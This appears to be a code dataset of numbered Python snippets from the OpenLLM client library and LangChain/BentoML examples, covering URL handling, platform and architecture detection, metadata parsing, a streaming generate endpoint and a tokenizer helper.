from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
def _address_converter(addr: str | httpx.URL) -> httpx.URL:
if isinstance(addr, httpx.URL):
url = addr
else:
url = httpx.URL(addr if '://' in addr else f'http://{addr}')
if not url.raw_path.endswith(b'/'):
url = url.copy_with(path=url.raw_path + b'/')
return url | null |
189,306 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
_T_co = t.TypeVar('_T_co', covariant=True)
_T = t.TypeVar('_T')
def _merge_mapping(a: t.Mapping[_T_co, _T], b: t.Mapping[_T_co, _T]) -> t.Dict[_T_co, _T]:
# does the merging and filter out None
return {k: v for k, v in {**a, **b}.items() if v is not None} | null |
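# Tiny illustration of the merge semantics above: keys from the second mapping win and
# None values are dropped from the result; the sample mappings are made up.
print(_merge_mapping({'a': 1, 'b': 2}, {'b': None, 'c': 3}))  # -> {'a': 1, 'c': 3}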
189,307 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
Platform = t.Annotated[
  LiteralString, t.Literal['MacOS', 'Linux', 'Windows', 'FreeBSD', 'OpenBSD', 'iOS', 'iPadOS', 'Android', 'Unknown'], str
]
def _platform() -> Platform:
system = platform.system().lower()
platform_name = platform.platform().lower()
if system == 'darwin':
return 'MacOS'
elif system == 'windows':
return 'Windows'
elif system == 'linux':
distro_id = distro.id()
if distro_id == 'freebsd':
return 'FreeBSD'
elif distro_id == 'openbsd':
return 'OpenBSD'
else:
return 'Linux'
elif 'android' in platform_name:
return 'Android'
elif 'iphone' in platform_name:
return 'iOS'
elif 'ipad' in platform_name:
return 'iPadOS'
if platform_name:
return f'Other:{platform_name}'
return 'Unknown' | null |
189,308 | from __future__ import annotations
import asyncio
import email.utils
import logging
import platform
import random
import time
import typing as t
import anyio
import attr
import distro
import httpx
from ._stream import AsyncStream, Response, Stream
from ._typing_compat import Architecture, LiteralString, Platform
from ._utils import converter
Architecture = t.Annotated[LiteralString, t.Literal['arm', 'arm64', 'x86', 'x86_64', 'Unknown'], str]
def _architecture() -> Architecture:
machine = platform.machine().lower()
if machine in {'arm64', 'aarch64'}:
return 'arm64'
elif machine in {'arm', 'aarch32'}:
return 'arm'
elif machine in {'x86_64', 'amd64'}:
return 'x86_64'
elif machine in {'x86', 'i386', 'i686'}:
return 'x86'
elif machine:
return f'Other:{machine}'
return 'Unknown' | null |
189,309 | from __future__ import annotations
import types
import typing as t
import attr
import orjson
from openllm_core._schemas import (
CompletionChunk as CompletionChunk,
GenerationOutput as Response, # backward compatibility
_SchemaMixin as _SchemaMixin,
)
from ._utils import converter
if t.TYPE_CHECKING:
from ._shim import AsyncClient, Client
# assumed: Metadata is an attrs model (attr is imported above); without a decorator the
# keyword construction in _structure_metadata below could not work
@attr.define
class Metadata(_SchemaMixin):
"""NOTE: Metadata is a modified version of the original MetadataOutput from openllm-core.
  The configuration is now structured into a dictionary for ease of use."""
model_id: str
timeout: int
model_name: str
backend: str
configuration: t.Dict[str, t.Any]
def _structure_metadata(data: t.Dict[str, t.Any], cls: type[Metadata]) -> Metadata:
try:
configuration = orjson.loads(data['configuration'])
generation_config = configuration.pop('generation_config')
configuration = {**configuration, **generation_config}
except orjson.JSONDecodeError as e:
raise RuntimeError(f'Malformed metadata configuration (Server-side issue): {e}') from None
try:
return cls(
model_id=data['model_id'],
timeout=data['timeout'],
model_name=data['model_name'],
backend=data['backend'],
configuration=configuration,
)
except Exception as e:
raise RuntimeError(f'Malformed metadata (Server-side issue): {e}') from None | null |
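# Illustrative use of the structuring hook above; the raw payload mimics the expected response
# shape (a JSON-encoded "configuration" string with a nested "generation_config") and every
# value below is made up.
_raw_metadata = {
  'model_id': 'HuggingFaceH4/zephyr-7b-alpha',
  'timeout': 3600,
  'model_name': 'zephyr',
  'backend': 'vllm',
  'configuration': orjson.dumps({'generation_config': {'temperature': 0.7}, 'max_new_tokens': 256}).decode(),
}
print(_structure_metadata(_raw_metadata, Metadata))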
189,310 | from __future__ import annotations
from langchain.agents import AgentType, initialize_agent, load_tools
from langchain.llms import OpenLLM
import bentoml
from bentoml.io import Text
agent = initialize_agent(tools, llm, agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION)
def chat(input_text: str):
return agent.run(input_text) | null |
189,311 | from __future__ import annotations
import uuid
from typing import Any, AsyncGenerator, Dict, TypedDict, Union
from bentoml import Service
from bentoml.io import JSON, Text
from openllm import LLM
llm = LLM[Any, Any]('HuggingFaceH4/zephyr-7b-alpha', backend='vllm')
class GenerateInput(TypedDict):
prompt: str
stream: bool
sampling_params: Dict[str, Any]
# assumed: the BentoML Service object and its api decorator around the kwargs below were trimmed
# from this excerpt; the service name 'tinyllm' is illustrative, the api kwargs are original.
svc = Service('tinyllm')
@svc.api(
  route='/v1/generate',
  input=JSON.from_sample(
    GenerateInput(prompt='What is time?', stream=False, sampling_params={'temperature': 0.73, 'logprobs': 1})
  ),
  output=Text(content_type='text/event-stream'),
)
async def generate(request: GenerateInput) -> Union[AsyncGenerator[str, None], str]:
n = request['sampling_params'].pop('n', 1)
request_id = f'tinyllm-{uuid.uuid4().hex}'
  previous_texts = [[] for _ in range(n)]  # one independent list per generated sequence
generator = llm.generate_iterator(request['prompt'], request_id=request_id, n=n, **request['sampling_params'])
async def streamer() -> AsyncGenerator[str, None]:
async for request_output in generator:
for output in request_output.outputs:
i = output.index
previous_texts[i].append(output.text)
yield output.text
if request['stream']:
return streamer()
async for _ in streamer(): pass
return ''.join(previous_texts[0]) | null |
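# Hedged client-side sketch for the endpoint above; assumes `bentoml serve` exposes the service
# on the default local port 3000 and that a non-streaming response is requested.
if __name__ == '__main__':
  import httpx
  resp = httpx.post(
    'http://localhost:3000/v1/generate',
    json={'prompt': 'What is time?', 'stream': False, 'sampling_params': {'temperature': 0.73, 'logprobs': 1}},
    timeout=60,
  )
  print(resp.text)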
189,312 | from __future__ import annotations
import typing as t
from langchain.chains import LLMChain
from langchain.llms import OpenLLM
from langchain.prompts import PromptTemplate
from pydantic import BaseModel
import bentoml
from bentoml.io import JSON, Text
def gen_llm(model_name: str, model_id: str | None = None, **attrs: t.Any) -> OpenLLM:
lc_llm = OpenLLM(model_name=model_name, model_id=model_id, embedded=False, **attrs)
lc_llm.runner.download_model()
return lc_llm | null |
189,313 | from __future__ import annotations
import typing as t
from langchain.chains import LLMChain
from langchain.llms import OpenLLM
from langchain.prompts import PromptTemplate
from pydantic import BaseModel
import bentoml
from bentoml.io import JSON, Text
class Query(BaseModel):
industry: str
product_name: str
keywords: t.List[str]
llm_config: t.Dict[str, t.Any]
chain = LLMChain(llm=llm, prompt=prompt)
def generate(query: Query):
return chain.run(
{'industry': query.industry, 'product_name': query.product_name, 'keywords': ', '.join(query.keywords)}
) | null |
189,314 | from __future__ import annotations
import openllm_core, pydantic, transformers, typing as t
from openllm_core._configuration import ModelSettings
def get_special_token_id(tokenizer: transformers.PreTrainedTokenizer, key: str) -> int:
token_ids = tokenizer.encode(key)
if len(token_ids) > 1:
raise ValueError(f"Expected only a single token for '{key}' but found {token_ids}")
return token_ids[0] | null |
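# Hedged usage sketch: downloads the GPT-2 tokenizer from the Hugging Face hub and registers a
# new special token first, so that it encodes to exactly one id as the helper requires.
if __name__ == '__main__':
  import transformers
  tok = transformers.AutoTokenizer.from_pretrained('gpt2')
  tok.add_special_tokens({'additional_special_tokens': ['<|endofprompt|>']})
  print(get_special_token_id(tok, '<|endofprompt|>'))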